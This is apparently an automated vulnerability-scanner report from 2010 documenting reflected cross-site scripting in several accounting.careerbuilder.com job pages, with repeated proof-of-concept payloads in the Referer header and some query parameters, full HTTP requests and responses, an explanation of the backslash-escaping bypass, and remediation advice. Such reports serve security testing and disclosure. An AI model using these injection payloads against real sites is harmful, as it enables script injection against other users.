HTTP/1.1 200 OK Cache-Control: private Content-Length: 174783 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR17 Date: Sun, 14 Nov 2010 23:00:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 64fde\\';alert(1)//5d5df63807f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8faa8\'%3balert(1)//21801b86e96 was submitted in the Referer HTTP header. This input was echoed as 8faa8\\';alert(1)//21801b86e96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Bookkeeping.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=8faa8\'%3balert(1)//21801b86e96
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174808 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR2 Date: Sun, 14 Nov 2010 23:00:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 8faa8\\';alert(1)//21801b86e96'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8edb\'%3balert(1)//31cc3c490aa was submitted in the Referer HTTP header. This input was echoed as e8edb\\';alert(1)//31cc3c490aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=e8edb\'%3balert(1)//31cc3c490aa
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174915 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR37 Date: Sun, 14 Nov 2010 23:17:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - e8edb\\';alert(1)//31cc3c490aa'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 204b3\'%3balert(1)//ea15dcf09e0 was submitted in the Referer HTTP header. This input was echoed as 204b3\\';alert(1)//ea15dcf09e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=204b3\'%3balert(1)//ea15dcf09e0
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174914 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: REBEL30 Date: Sun, 14 Nov 2010 23:24:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 204b3\\';alert(1)//ea15dcf09e0'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcce7\'%3balert(1)//9598df8cd85 was submitted in the Referer HTTP header. This input was echoed as bcce7\\';alert(1)//9598df8cd85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_CPA.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=bcce7\'%3balert(1)//9598df8cd85
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174487 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR14 Date: Sun, 14 Nov 2010 23:18:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bcce7\\';alert(1)//9598df8cd85'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33186\'%3balert(1)//aae926feec9 was submitted in the Referer HTTP header. This input was echoed as 33186\\';alert(1)//aae926feec9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Consulting.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=33186\'%3balert(1)//aae926feec9
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174798 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR12 Date: Sun, 14 Nov 2010 22:57:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 33186\\';alert(1)//aae926feec9'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31cf1\'%3balert(1)//319a1f8dbd9 was submitted in the Referer HTTP header. This input was echoed as 31cf1\\';alert(1)//319a1f8dbd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=31cf1\'%3balert(1)//319a1f8dbd9
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174910 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR36 Date: Sun, 14 Nov 2010 23:16:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 31cf1\\';alert(1)//319a1f8dbd9'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db50e\'%3balert(1)//163dd70bd93 was submitted in the Referer HTTP header. This input was echoed as db50e\\';alert(1)//163dd70bd93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=db50e\'%3balert(1)//163dd70bd93
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174965 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR19 Date: Sun, 14 Nov 2010 23:25:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - db50e\\';alert(1)//163dd70bd93'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c0c5\'%3balert(1)//4d023b426f1 was submitted in the Referer HTTP header. This input was echoed as 1c0c5\\';alert(1)//4d023b426f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_CostAccounting.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=1c0c5\'%3balert(1)//4d023b426f1
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174964 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR11 Date: Sun, 14 Nov 2010 23:18:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 1c0c5\\';alert(1)//4d023b426f1'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e622\'%3balert(1)//15847bde122 was submitted in the Referer HTTP header. This input was echoed as 5e622\\';alert(1)//15847bde122 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Executive.htm HTTP/1.1 Host: accounting.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0; Referer: http://www.google.com/search?hl=en&q=5e622\'%3balert(1)//15847bde122
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 174898 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/ X-Powered-By: ASP.NET X-PBY: BEAR33 Date: Sun, 14 Nov 2010 23:19:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 5e622\\';alert(1)//15847bde122'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c113\'%3balert(1)//a10bfebdfb8 was submitted in the Referer HTTP header. This input was echoed as 3c113\\';alert(1)//a10bfebdfb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
